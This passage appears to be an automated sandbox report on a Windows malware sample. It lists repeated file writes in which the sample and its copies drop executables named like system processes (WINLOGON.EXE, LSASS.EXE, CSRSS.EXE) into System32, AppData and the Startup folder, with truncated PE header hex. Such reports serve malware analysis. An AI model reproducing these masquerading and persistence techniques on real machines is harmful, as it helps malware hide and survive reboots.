4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46822 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46940 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46801 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46850 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46869 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46905 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46833 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46797 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46811 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46794 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46833 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46842 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46843 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46923 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46911 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46972 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46930 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46734 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46873 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46830 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46705 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46895 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46939 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46902 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46925 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46754 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46812 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46827 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46778 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46798 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46859 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46759 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46971 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46823 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46868 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46863 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46894 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46814 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46854 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46848 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46846 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46930 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46752 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46910 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46770 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46971 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46847 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46821 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46813 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46801 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46899 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46987 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46757 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46913 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46939 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46936 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46870 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46944 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46748 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46902 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46872 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46845 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46719 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46721 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46769 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46827 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46883 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46841 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46839 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46903 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46780 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46854 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46883 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 